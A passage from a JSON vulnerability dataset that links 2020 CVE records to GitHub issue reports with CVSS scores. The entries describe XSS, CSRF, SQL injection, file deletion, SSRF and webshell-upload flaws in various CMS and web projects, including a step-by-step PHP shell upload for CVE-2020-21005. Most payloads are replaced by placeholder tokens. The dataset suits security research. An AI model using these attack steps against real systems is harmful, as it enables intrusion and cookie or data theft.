  53114. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  53115. "severity": "HIGH",
  53116. "baseScore": 7.5,
  53117. "impactScore": 3.6,
  53118. "exploitabilityScore": 3.9
  53119. },
  53120. {
  53121. "CVE_ID": "CVE-2020-20982",
  53122. "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/1",
  53123. "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/1",
  53124. "Repo_new": "shadoweb/wdja",
  53125. "Issue_Created_At": "2019-10-23T09:01:20Z",
  53126. "description": "There is a reflected XSS vulnerability. Click the url below: URLTAG PATHTAG NUMBERTAG Then you will see the alert window. Attacker could use the vulnerability to steal admin's cookie and log in as the admin account",
  53127. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  53128. "severity": "CRITICAL",
  53129. "baseScore": 9.6,
  53130. "impactScore": 6.0,
  53131. "exploitabilityScore": 2.8
  53132. },
  53133. {
  53134. "CVE_ID": "CVE-2020-21003",
  53135. "Issue_Url_old": "https://github.com/Computer2200/-/issues/3",
  53136. "Issue_Url_new": "https://github.com/computer2200/-/issues/3",
  53137. "Repo_new": "Computer2200/-",
  53138. "Issue_Created_At": "2020-01-01T05:31:19Z",
  53139. "description": "Pbootcms NUMBERTAG background storage XSS. step1 Access admin page FILETAG FILETAG step2 URLTAG FILETAG step3 FILETAG step4 FILETAG",
  53140. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  53141. "severity": "MEDIUM",
  53142. "baseScore": 4.8,
  53143. "impactScore": 2.7,
  53144. "exploitabilityScore": 1.7
  53145. },
  53146. {
  53147. "CVE_ID": "CVE-2020-21005",
  53148. "Issue_Url_old": "https://github.com/Computer2200/-/issues/4",
  53149. "Issue_Url_new": "https://github.com/computer2200/-/issues/4",
  53150. "Repo_new": "Computer2200/-",
  53151. "Issue_Created_At": "2020-01-01T14:00:15Z",
  53152. "description": "APITAG NUMBERTAG Getshell. Step1\uff1a Login the CMS background: FILETAG Step2\uff1a Enter \"background management\", locate the utilization point, click the picture in the red box below to upload: FILETAG Upload and grab data packets: FILETAG Step NUMBERTAG modify the \"filetype\" parameter type in the post package to \"PHP\"; after analysis, the \"data\" parameter is Base NUMBERTAG encrypted. Here we will construct the test data \" APITAG through base NUMBERTAG encryption and other structures to form the data of the\" data \"parameter: Data NUMBERTAG aimage NUMBERTAG fjpeg NUMBERTAG bbase NUMBERTAG cpd9wahagcghwaw5mbygpoz NUMBERTAG B\uff0c Finally, the data package is released and the path to upload to PHP file is returned Path: FILETAG Finally, success: FILETAG Try connecting shells again: Payload: APITAG FILETAG Connect shell successfully: FILETAG APITAG Locate the code file according to the vulnerability: route / FILETAG The code is as follows: if ($action == 'create') { // hook FILETAG APITAG // hook FILETAG $backstage = param NUMBERTAG width = param('width NUMBERTAG height = param('height NUMBERTAG is_image = param('is_image NUMBERTAG name = param('name'); $data = param_base NUMBERTAG data'); $mode = param('mode NUMBERTAG filetype = param('filetype'); // \u538b\u7f29\u56fe\u7247\u540e\u7f00jpeg jpg png\u7b49 $convert = param('convert NUMBERTAG n = param('n NUMBERTAG type = param('type NUMBERTAG type NUMBERTAG SESSION\u6570\u7ec4\u9644\u4ef6\u6570\u91cf\u7edf\u8ba1\uff0ctype NUMBERTAG n\u6570\u503c // hook FILETAG // \u5141\u8bb8\u7684\u6587\u4ef6\u540e\u7f00\u540d //$types = include APITAG //$allowtypes = $types['all']; empty($group['allowattach']) AND $gid NUMBERTAG AND message NUMBERTAG hook FILETAG empty($data) AND message NUMBERTAG lang('data_is_empty')); //$data = APITAG $size = strlen($data); $size NUMBERTAG AND message NUMBERTAG lang('filesize_too_large', array('maxsize NUMBERTAG M', 'size' => $size))); // hook FILETAG // \u83b7\u53d6\u6587\u4ef6\u540e\u7f00\u540d APITAG $ext = file_ext($name NUMBERTAG filetypes = include APP_PATH . APITAG // hook FILETAG //\u4e3b\u56fe\u5fc5\u987b\u4e3a\u56fe\u7247 if ($is_image NUMBERTAG mode NUMBERTAG in_array($ext, $filetypes['image'])) message NUMBERTAG APITAG // hook FILETAG // \u5982\u679c\u6587\u4ef6\u540e\u7f00\u4e0d\u5728\u89c4\u5b9a\u8303\u56f4\u5185 \u6539\u53d8\u540e\u7f00\u540d //!in_array($ext, $filetypes['all']) AND $ext = '_' . $ext; if (!in_array($ext, $filetypes['all'])) { $ext = '_' . $ext; } else { // CMS\u4e0a\u4f20\u56fe\u7247 $t NUMBERTAG AND $convert NUMBERTAG AND $is_image NUMBERTAG AND $ext = $filetype; } // hook FILETAG $tmpanme = $uid . '_' . xn_rand NUMBERTAG ext; // hook FILETAG $tmpfile = $conf['upload_path'] . 'tmp/' . $tmpanme; // hook FILETAG $tmpurl = $conf['upload_url'] . 'tmp/' . $tmpanme; // hook FILETAG $filetype = attach_type($name, $filetypes); // hook FILETAG file_put_contents($tmpfile, $data) OR message NUMBERTAG APITAG // hook FILETAG // \u4fdd\u5b58\u5230 session\uff0c\u53d1\u5e16\u6210\u529f\u4ee5\u540e\uff0c\u5173\u8054\u5230\u5e16\u5b50\u3002 // save attach information to session, associate to post after create thread. // \u629b\u5f03\u4e4b\u524d\u7684 $_SESSION \u6570\u636e\uff0c\u91cd\u65b0\u542f\u52a8 session\uff0c\u964d\u4f4e session \u5e76\u53d1\u5199\u5165\u7684\u95ee\u9898 // Discard the previous $_SESSION data, restart the session, reduce the problem of concurrent session write APITAG empty($t) AND empty($_SESSION['tmp_files']) AND $_SESSION['tmp_files'] = APITAG $t NUMBERTAG AND APITAG AND APITAG = APITAG // hook FILETAG // type NUMBERTAG SESSION\u6570\u7ec4\u9644\u4ef6\u6570\u91cf\u7edf\u8ba1\uff0ctype NUMBERTAG n\u6570\u503c empty($type) AND $n = ($t NUMBERTAG APITAG : APITAG $filesize = filesize($tmpfile); $attach = array( 'backstage' => $backstage NUMBERTAG url' => $backstage ? '../' . $tmpurl : '' . $tmpurl, 'path' => $tmpfile, 'orgfilename' => $name, 'filetype' => $filetype, 'filesize' => $filesize, 'width' => $width, 'height' => $height, 'isimage' => $is_image, 'downloads NUMBERTAG aid' => '_' . $n ); // hook FILETAG if ($mode NUMBERTAG hook FILETAG $_SESSION['tmp_thumbnail'] = $attach; // hook FILETAG } else { // hook FILETAG NUMBERTAG BBS NUMBERTAG CMS $t NUMBERTAG APITAG = $attach : $_SESSION['tmp_files'][$n] = $attach; // hook FILETAG } // hook FILETAG unset($attach['path']); // hook FILETAG message NUMBERTAG attach); } General process NUMBERTAG First, accept the relevant parameters and set the filetype to \"PHP\" by itself: $data = param_base NUMBERTAG data'); $filetype = param('filetype NUMBERTAG Make logical judgment: if (!in_array($ext, $filetypes['all'])) { $ext = '_' . $ext; } else { //CMS upload picture $t NUMBERTAG AND $convert NUMBERTAG AND $is_image NUMBERTAG AND $ext = $filetype NUMBERTAG Last write successful: $tmpanme = $uid . '_' . xn_rand NUMBERTAG ext; // hook FILETAG $tmpfile = $conf['upload_path'] . 'tmp/' . $tmpanme; // hook FILETAG $tmpurl = $conf['upload_url'] . 'tmp/' . $tmpanme; // hook FILETAG $filetype = attach_type($name, $filetypes); // hook FILETAG file_put_contents($tmpfile, $data) OR message NUMBERTAG APITAG",
  53153. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  53154. "severity": "MEDIUM",
  53155. "baseScore": 6.5,
  53156. "impactScore": 3.6,
  53157. "exploitabilityScore": 2.8
  53158. },
  53159. {
  53160. "CVE_ID": "CVE-2020-21013",
  53161. "Issue_Url_old": "https://github.com/emlog/emlog/issues/52",
  53162. "Issue_Url_new": "https://github.com/emlog/emlog/issues/52",
  53163. "Repo_new": "emlog/emlog",
  53164. "Issue_Created_At": "2019-10-31T08:09:34Z",
  53165. "description": "emlog has SQL injection vulnerability. vulnerability in FILETAG line NUMBERTAG CODETAG vulnerability in PATHTAG line NUMBERTAG ERRORTAG vulnerability in PATHTAG line NUMBERTAG ERRORTAG Login Required admin. The token parameter constructed is the value of \"EM_TOKENCOOKIE_...\" in the cookie. action=delbyip ip NUMBERTAG and APITAG APITAG POC\uff1a CODETAG FILETAG",
  53166. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  53167. "severity": "HIGH",
  53168. "baseScore": 7.2,
  53169. "impactScore": 5.9,
  53170. "exploitabilityScore": 1.2
  53171. },
  53172. {
  53173. "CVE_ID": "CVE-2020-21014",
  53174. "Issue_Url_old": "https://github.com/emlog/emlog/issues/53",
  53175. "Issue_Url_new": "https://github.com/emlog/emlog/issues/53",
  53176. "Repo_new": "emlog/emlog",
  53177. "Issue_Created_At": "2019-10-31T09:50:06Z",
  53178. "description": "emlog has any file deletion vulnerability. vulnerability in FILETAG line NUMBERTAG ERRORTAG Get any filepath as \"plugin\" , will delete it. The token parameter constructed is the value of \"EM_TOKENCOOKIE_...\" in the cookie. Login management background and view APITAG GET plugin=anyfile,like FILETAG something. POC: CODETAG FILETAG FILETAG",
  53179. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  53180. "severity": "MEDIUM",
  53181. "baseScore": 6.5,
  53182. "impactScore": 5.2,
  53183. "exploitabilityScore": 1.2
  53184. },
  53185. {
  53186. "CVE_ID": "CVE-2020-21048",
  53187. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/73",
  53188. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/73",
  53189. "Repo_new": "saitoha/libsixel",
  53190. "Issue_Created_At": "2018-07-28T11:57:09Z",
  53191. "description": "Multiple crashes when converting png files. Our fuzzer detected several crashes when converting png files against NUMBERTAG df NUMBERTAG compiled with Address Sanitizer). The command to trigger that is APITAG where $POC can be: heap buffer overflow FILETAG FILETAG gdb output is like: ERRORTAG two aborts (linked with libpng NUMBERTAG there is a similar issue as observed in URLTAG FILETAG FILETAG FILETAG FILETAG gdb outputs are like: ERRORTAG Other system information: ERRORTAG",
  53192. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  53193. "severity": "MEDIUM",
  53194. "baseScore": 6.5,
  53195. "impactScore": 3.6,
  53196. "exploitabilityScore": 2.8
  53197. },
  53198. {
  53199. "CVE_ID": "CVE-2020-21049",
  53200. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/74",
  53201. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/74",
  53202. "Repo_new": "saitoha/libsixel",
  53203. "Issue_Created_At": "2018-07-28T12:00:04Z",
  53204. "description": "Address Sanitizer: invalid read at APITAG Our fuzzer detected several crashes when converting PSD file against NUMBERTAG df NUMBERTAG compiled with Address Sanitizer). The command to trigger that is APITAG where $POC is: FILETAG gdb output: CODETAG",
  53205. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  53206. "severity": "MEDIUM",
  53207. "baseScore": 6.5,
  53208. "impactScore": 3.6,
  53209. "exploitabilityScore": 2.8
  53210. },
  53211. {
  53212. "CVE_ID": "CVE-2020-21050",
  53213. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/75",
  53214. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/75",
  53215. "Repo_new": "saitoha/libsixel",
  53216. "Issue_Created_At": "2018-07-28T12:04:34Z",
  53217. "description": "APITAG stack buffer overflow at APITAG Our fuzzer detected several crashes when converting gif file against NUMBERTAG df NUMBERTAG compiled with Address Sanitizer). The command to trigger that is APITAG where $POC can be: FILETAG FILETAG gdb output is like: ERRORTAG",
  53218. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  53219. "severity": "MEDIUM",
  53220. "baseScore": 6.5,
  53221. "impactScore": 3.6,
  53222. "exploitabilityScore": 2.8
  53223. },
  53224. {
  53225. "CVE_ID": "CVE-2020-21081",
  53226. "Issue_Url_old": "https://github.com/magicblack/maccms8/issues/2",
  53227. "Issue_Url_new": "https://github.com/magicblack/maccms8/issues/2",
  53228. "Repo_new": "magicblack/maccms8",
  53229. "Issue_Created_At": "2019-10-28T08:33:24Z",
  53230. "description": "APITAG xss \u5728\u540e\u53f0\u7ba1\u7406\u5458\u6587\u7ae0\u7ba1\u7406\u5904\uff0c\u6dfb\u52a0\u548c\u4fee\u6539\u5b58\u5728xss\u6f0f\u6d1e \u5728\u8f93\u5165\u4e2d\u6587\u540d\u548c\u82f1\u6587\u540d\u7684\u5730\u65b9\uff0c\u540e\u9762\u8f93\u5165 APITAG \uff0c\u5982\u4e0b\u56fe FILETAG APITAG FILETAG \u524d\u7aef\u9875\u9762\u9f20\u6807\u79fb\u5230\u6807\u9898\u4e0a\u4e5f\u4f1a\u5f39\u51fa\u7528\u6237cookie FILETAG csrf \u53d1\u73b0\u5728\u6dfb\u52a0\u548c\u4fee\u6539\u7684\u5730\u65b9\u540c\u65f6\u5b58\u5728csrf \u5229\u7528\u524d FILETAG \u5f53\u6784\u9020\u5982\u4e0b\u9875\u9762\uff0c\u8bf1\u5bfc\u7ba1\u7406\u5458\u70b9\u51fb CODETAG \u5f53\u7ba1\u7406\u5458\u8bbf\u95ee\u70b9\u51fb\u9875\u9762 FILETAG \u6210\u529f\u6dfb\u52a0\u5206\u7c7b FILETAG csrf+xss APITAG CODETAG APITAG FILETAG",
  53231. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  53232. "severity": "MEDIUM",
  53233. "baseScore": 6.5,
  53234. "impactScore": 3.6,
  53235. "exploitabilityScore": 2.8
  53236. },
  53237. {
  53238. "CVE_ID": "CVE-2020-21087",
  53239. "Issue_Url_old": "https://github.com/X2Engine/X2CRM/issues/162",
  53240. "Issue_Url_new": "https://github.com/x2engine/x2crm/issues/162",
  53241. "Repo_new": "x2engine/x2crm",
  53242. "Issue_Created_At": "2018-11-06T11:20:22Z",
  53243. "description": "Stored XSS in module name . Hi agian Description : XSS in module name will prompt in all other pages of NUMBERTAG CRM CE NUMBERTAG Sample Pic: FILETAG Payload to use : \"> APITAG Tested on Windows NUMBERTAG Firefox | Google Chrome // Cent OS NUMBERTAG Firefox | Chromium BR, Milad Fadavvi",
  53244. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53245. "severity": "MEDIUM",
  53246. "baseScore": 6.1,
  53247. "impactScore": 2.7,
  53248. "exploitabilityScore": 2.8
  53249. },
  53250. {
  53251. "CVE_ID": "CVE-2020-21088",
  53252. "Issue_Url_old": "https://github.com/X2Engine/X2CRM/issues/183",
  53253. "Issue_Url_new": "https://github.com/x2engine/x2crm/issues/183",
  53254. "Repo_new": "x2engine/x2crm",
  53255. "Issue_Created_At": "2021-02-11T06:35:05Z",
  53256. "description": "Multiple Cross Site Scripting in NUMBERTAG CRM NUMBERTAG Hi, I have found the multiple stored XSS in the NUMBERTAG crm version NUMBERTAG I like to report them and get the CVE. Location: URLTAG Parameter: Last Name Payload inserted FILETAG Execution of the payload FILETAG Location: URLTAG Parameter: comments payload inserted FILETAG Execution of the payload FILETAG",
  53257. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  53258. "severity": "MEDIUM",
  53259. "baseScore": 4.8,
  53260. "impactScore": 2.7,
  53261. "exploitabilityScore": 1.7
  53262. },
  53263. {
  53264. "CVE_ID": "CVE-2020-21088",
  53265. "Issue_Url_old": "https://github.com/X2Engine/X2CRM/issues/161",
  53266. "Issue_Url_new": "https://github.com/x2engine/x2crm/issues/161",
  53267. "Repo_new": "x2engine/x2crm",
  53268. "Issue_Created_At": "2018-11-06T11:12:54Z",
  53269. "description": "Stored XSS in Contact firsname and last name. Hi, Description : Create a contact with first name: test\"> APITAG and last name : test2\"> APITAG ( you can even delete the contact its worst!) XSS will run in to all pages than activity feed is present. ( in NUMBERTAG CRM CE NUMBERTAG Sample Pic: FILETAG Payload to use : \"> APITAG Tested on Windows NUMBERTAG Firefox | Google Chrome // Cent OS NUMBERTAG Firefox | Chromium BR, Milad Fadavvi",
  53270. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  53271. "severity": "MEDIUM",
  53272. "baseScore": 4.8,
  53273. "impactScore": 2.7,
  53274. "exploitabilityScore": 1.7
  53275. },
  53276. {
  53277. "CVE_ID": "CVE-2020-21101",
  53278. "Issue_Url_old": "https://github.com/Screenly/screenly-ose/issues/1254",
  53279. "Issue_Url_new": "https://github.com/screenly/anthias/issues/1254",
  53280. "Repo_new": "screenly/anthias",
  53281. "Issue_Created_At": "2019-11-12T11:55:32Z",
  53282. "description": "Cross Site Scripting APITAG vulnerability. Describe the bug Suggested description of the vulnerability : A stored cross site scripting (XSS) vulnerability in the APITAG Asset' page of Screenly OSE allows a remote attacker to introduce arbitary Javascript via manipulation of a 'URL' filed. Attack vector(s) FILETAG NUMBERTAG Press the APITAG Asset' button in the upper right corner. FILETAG NUMBERTAG Enter ERRORTAG in the APITAG URL' field. FILETAG NUMBERTAG When accessing the main page APITAG Overview' menu), arbitrary code is executed. APITAG same vulnerability occurs when uploading to a file other than a URL.) Affected URL/API(s) APITAG Environment Raspberry Pi Hardware Version: Model NUMBERTAG B+ Revision NUMBERTAG Ram NUMBERTAG GB Sony UK Screenly OSE Version NUMBERTAG Screenly OSE lite.img",
  53283. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  53284. "severity": "MEDIUM",
  53285. "baseScore": 5.4,
  53286. "impactScore": 2.7,
  53287. "exploitabilityScore": 2.3
  53288. },
  53289. {
  53290. "CVE_ID": "CVE-2020-21122",
  53291. "Issue_Url_old": "https://github.com/youseries/ureport/issues/483",
  53292. "Issue_Url_new": "https://github.com/youseries/ureport/issues/483",
  53293. "Repo_new": "youseries/ureport",
  53294. "Issue_Created_At": "2019-11-29T04:20:17Z",
  53295. "description": "An unauthorized SSRF vulnerability in the designer page.. In this part of source code, we find that users can make connection requests to any IP address. FILETAG Then we found that the designer page did not verify the access user's permission. So we can directly implement the SSRF attack on this page to detect the database port of the intranet device. FILETAG FILETAG When the database port is detected to be open, the page will respond to the database login failure. FILETAG",
  53296. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  53297. "severity": "MEDIUM",
  53298. "baseScore": 5.3,
  53299. "impactScore": 1.4,
  53300. "exploitabilityScore": 3.9
  53301. },
  53302. {
  53303. "CVE_ID": "CVE-2020-21124",
  53304. "Issue_Url_old": "https://github.com/youseries/ureport/issues/484",
  53305. "Issue_Url_new": "https://github.com/youseries/ureport/issues/484",
  53306. "Repo_new": "youseries/ureport",
  53307. "Issue_Created_At": "2019-11-29T05:25:46Z",
  53308. "description": "Local malicious class loading and code execution vulnerability due to unauthorized access to designer page.. With the following source code, we can easily find that the 'class. Forname' method can load malicious classes. FILETAG APITAG is a method for JVM to retrieve and load into memory. In this process, the static phase of loading class will be executed. In other words, if a malicious class is defined in advance, you can execute the static code block of the malicious class here. FILETAG We successfully execute the code by loading the malicious classes set in advance. FILETAG",
  53309. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53310. "severity": "CRITICAL",
  53311. "baseScore": 9.8,
  53312. "impactScore": 5.9,
  53313. "exploitabilityScore": 3.9
  53314. },
  53315. {
  53316. "CVE_ID": "CVE-2020-21125",
  53317. "Issue_Url_old": "https://github.com/youseries/ureport/issues/485",
  53318. "Issue_Url_new": "https://github.com/youseries/ureport/issues/485",
  53319. "Repo_new": "youseries/ureport",
  53320. "Issue_Created_At": "2019-11-30T06:24:02Z",
  53321. "description": "Remote code execution vulnerability due to arbitrary file creation.. We find the stored part of this file by searching the key functions. FILETAG View calls in this section FILETAG Network truncation of parameter transfer in this part. FILETAG Try to modify to JSP webshell. FILETAG The error reported here is an error occurred during XML parsing, but the file has been written into the server. FILETAG Find this directory. FILETAG Of course, this directory can't access JSP. Try to cross directory with relative path. FILETAG FILETAG Successfully cross directory and get webshell. FILETAG",
  53322. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53323. "severity": "CRITICAL",
  53324. "baseScore": 9.8,
  53325. "impactScore": 5.9,
  53326. "exploitabilityScore": 3.9
  53327. },
  53328. {
  53329. "CVE_ID": "CVE-2020-21126",
  53330. "Issue_Url_old": "https://github.com/Echox1/metinfo_csrf/issues/1",
  53331. "Issue_Url_new": "https://github.com/echox1/metinfo_csrf/issues/1",
  53332. "Repo_new": "echox1/metinfo_csrf",
  53333. "Issue_Created_At": "2019-12-02T08:00:27Z",
  53334. "description": "There is a csrf via APITAG to update the admin user. There is a csrf via APITAG to update the admin user account request: ERRORTAG payload: CODETAG use burpsuite test FILETAG",
  53335. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  53336. "severity": "HIGH",
  53337. "baseScore": 8.8,
  53338. "impactScore": 5.9,
  53339. "exploitabilityScore": 2.8
  53340. },
  53341. {
  53342. "CVE_ID": "CVE-2020-21127",
  53343. "Issue_Url_old": "https://github.com/T3qui1a/metinfo_sqlinjection/issues/1",
  53344. "Issue_Url_new": "https://github.com/t3qui1a/metinfo_sqlinjection/issues/1",
  53345. "Repo_new": "t3qui1a/metinfo_sqlinjection",
  53346. "Issue_Created_At": "2019-12-02T12:43:03Z",
  53347. "description": "There is a sqlinjection via APITAG FILETAG line NUMBERTAG line NUMBERTAG FILETAG the parameter \"id\" can be inject FILETAG payload: CODETAG",
  53348. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53349. "severity": "CRITICAL",
  53350. "baseScore": 9.8,
  53351. "impactScore": 5.9,
  53352. "exploitabilityScore": 3.9
  53353. },
  53354. {
  53355. "CVE_ID": "CVE-2020-21130",
  53356. "Issue_Url_old": "https://github.com/hisiphp/hisiphp/issues/7",
  53357. "Issue_Url_new": "https://github.com/hisiphp/hisiphp/issues/7",
  53358. "Repo_new": "hisiphp/hisiphp",
  53359. "Issue_Created_At": "2019-10-31T12:49:29Z",
  53360. "description": "from CSRF to stored XSS Stealing administrator cookies. When adding a group FILETAG it has CSRF to add a group FILETAG then it has stored XSS FILETAG CSRF poc CODETAG",
  53361. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53362. "severity": "MEDIUM",
  53363. "baseScore": 6.1,
  53364. "impactScore": 2.7,
  53365. "exploitabilityScore": 2.8
  53366. },
  53367. {
  53368. "CVE_ID": "CVE-2020-21131",
  53369. "Issue_Url_old": "https://github.com/SZFsir/tmpProject/issues/3",
  53370. "Issue_Url_new": "https://github.com/szfsir/tmpproject/issues/3",
  53371. "Repo_new": "szfsir/tmpproject",
  53372. "Issue_Created_At": "2019-11-07T09:01:40Z",
  53373. "description": "Metinfo NUMBERTAG admin background SQL Injection. Vulnerability Name: APITAG CMS SQL Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG After admin APITAG must send different order and mask column below) payload ERRORTAG FILETAG",
  53374. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  53375. "severity": "HIGH",
  53376. "baseScore": 7.2,
  53377. "impactScore": 5.9,
  53378. "exploitabilityScore": 1.2
  53379. },
  53380. {
  53381. "CVE_ID": "CVE-2020-21132",
  53382. "Issue_Url_old": "https://github.com/SZFsir/tmpProject/issues/2",
  53383. "Issue_Url_new": "https://github.com/szfsir/tmpproject/issues/2",
  53384. "Repo_new": "szfsir/tmpproject",
  53385. "Issue_Created_At": "2019-11-07T08:52:22Z",
  53386. "description": "Metinfo NUMBERTAG SQL Injection. Vulnerability Name: APITAG CMS SQL Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG To demonstrate this vuln, follow three steps below. First, Get the key Metinfo disclosure the key by FILETAG FILETAG Then, encrypt the payload Metinfo NUMBERTAG Use encrypt cookie to auth login. We can see it use user input as auth and key to pass it to login_by_auth function FILETAG In login_by_auth function, It use getauth function decode the auth data by the key we input. FILETAG And then in login_by_password pass the username(sql inject payload) and then cause sqli We have the key, and we know the way to encrypt data. As below ERRORTAG FILETAG Finally, send the payload APITAG should encrypt the data first) CODETAG (execute the sql twice) FILETAG",
  53387. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53388. "severity": "CRITICAL",
  53389. "baseScore": 9.8,
  53390. "impactScore": 5.9,
  53391. "exploitabilityScore": 3.9
  53392. },
  53393. {
  53394. "CVE_ID": "CVE-2020-21133",
  53395. "Issue_Url_old": "https://github.com/SZFsir/tmpProject/issues/1",
  53396. "Issue_Url_new": "https://github.com/szfsir/tmpproject/issues/1",
  53397. "Repo_new": "szfsir/tmpproject",
  53398. "Issue_Created_At": "2019-11-07T08:06:40Z",
  53399. "description": "Metinfo NUMBERTAG SQL Injection. Vulnerability Name: APITAG CMS SQL Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG To demonstrate this vuln, follow three steps below. First, Get the key Metinfo disclosure the key by FILETAG FILETAG Then, encrypt the payload Metinfo NUMBERTAG Use encrypt email to check email valid. We can see after decode the data, It pass the email to get_user_by_email function FILETAG Then get_user_by_email function pass it to get_user_by_emailid function FILETAG Finally, It cause sql injection. FILETAG We have the key, and we know the way to encrypt data. As below ERRORTAG FILETAG Finally, send the payload APITAG should encrypt the data first) CODETAG FILETAG",
  53400. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53401. "severity": "CRITICAL",
  53402. "baseScore": 9.8,
  53403. "impactScore": 5.9,
  53404. "exploitabilityScore": 3.9
  53405. },
  53406. {
  53407. "CVE_ID": "CVE-2020-21146",
  53408. "Issue_Url_old": "https://github.com/liufee/cms/issues/43",
  53409. "Issue_Url_new": "https://github.com/liufee/cms/issues/43",
  53410. "Repo_new": "liufee/cms",
  53411. "Issue_Created_At": "2019-11-01T10:27:58Z",
  53412. "description": "XSS vulnerability in feihicms NUMBERTAG This is a Cross Site Scripting vulnerability. When the user name is APITAG alert NUMBERTAG APITAG or js code, the pop up alert will be triggered when browsing the post. Details are as follows: POC example: registered\uff1a CODETAG login\uff1a CODETAG registered\uff1a FILETAG login: FILETAG View post\uff1a FILETAG FILETAG How to fix: URLTAG",
  53413. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53414. "severity": "MEDIUM",
  53415. "baseScore": 6.1,
  53416. "impactScore": 2.7,
  53417. "exploitabilityScore": 2.8
  53418. },
  53419. {
  53420. "CVE_ID": "CVE-2020-21147",
  53421. "Issue_Url_old": "https://github.com/alixiaowei/alixiaowei.github.io/issues/2",
  53422. "Issue_Url_new": "https://github.com/alixiaowei/alixiaowei.github.io/issues/2",
  53423. "Repo_new": "alixiaowei/alixiaowei.github.io",
  53424. "Issue_Created_At": "2019-10-14T13:59:49Z",
  53425. "description": "There is one Storage type XSS vulnerability that can js code execution. Vulnerability path: PATHTAG line NUMBERTAG ERRORTAG Send email no filtering of dangerous characters leads to XSS, which can be used to obtain administrator cookies. Verification: user: wangjing wangjing(user) send email administrator title: APITAG FILETAG poc: ERRORTAG After the administrator logged Trigger XSS FILETAG",
  53426. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  53427. "severity": "MEDIUM",
  53428. "baseScore": 4.8,
  53429. "impactScore": 2.7,
  53430. "exploitabilityScore": 1.7
  53431. },
  53432. {
  53433. "CVE_ID": "CVE-2020-21179",
  53434. "Issue_Url_old": "https://github.com/wclimb/Koa2-blog/issues/40",
  53435. "Issue_Url_new": "https://github.com/wunci/koa2-blog/issues/40",
  53436. "Repo_new": "wunci/koa2-blog",
  53437. "Issue_Created_At": "2019-11-28T07:35:07Z",
  53438. "description": "koa2 blog NUMBERTAG sql injection vulnerability. A sql injection was discovered in WUZHI CMS NUMBERTAG APITAG is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via: APITAG Vulnerability code APITAG POC Trigger SQL injection vulnerability by registering new users FILETAG",
  53439. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53440. "severity": "CRITICAL",
  53441. "baseScore": 9.8,
  53442. "impactScore": 5.9,
  53443. "exploitabilityScore": 3.9
  53444. },
  53445. {
  53446. "CVE_ID": "CVE-2020-21180",
  53447. "Issue_Url_old": "https://github.com/wclimb/Koa2-blog/issues/41",
  53448. "Issue_Url_new": "https://github.com/wunci/koa2-blog/issues/41",
  53449. "Repo_new": "wunci/koa2-blog",
  53450. "Issue_Created_At": "2019-11-28T07:53:03Z",
  53451. "description": "koa2 blog NUMBERTAG sql injection vulnerability. A sql injection was discovered in koa2 blog NUMBERTAG APITAG is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via: APITAG Vulnerability code ERRORTAG POC Trigger SQL injection vulnerability by registering new users,we can see that the injected statement executed successfully and the page response timed out for NUMBERTAG S FILETAG FILETAG",
  53452. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53453. "severity": "CRITICAL",
  53454. "baseScore": 9.8,
  53455. "impactScore": 5.9,
  53456. "exploitabilityScore": 3.9
  53457. },
  53458. {
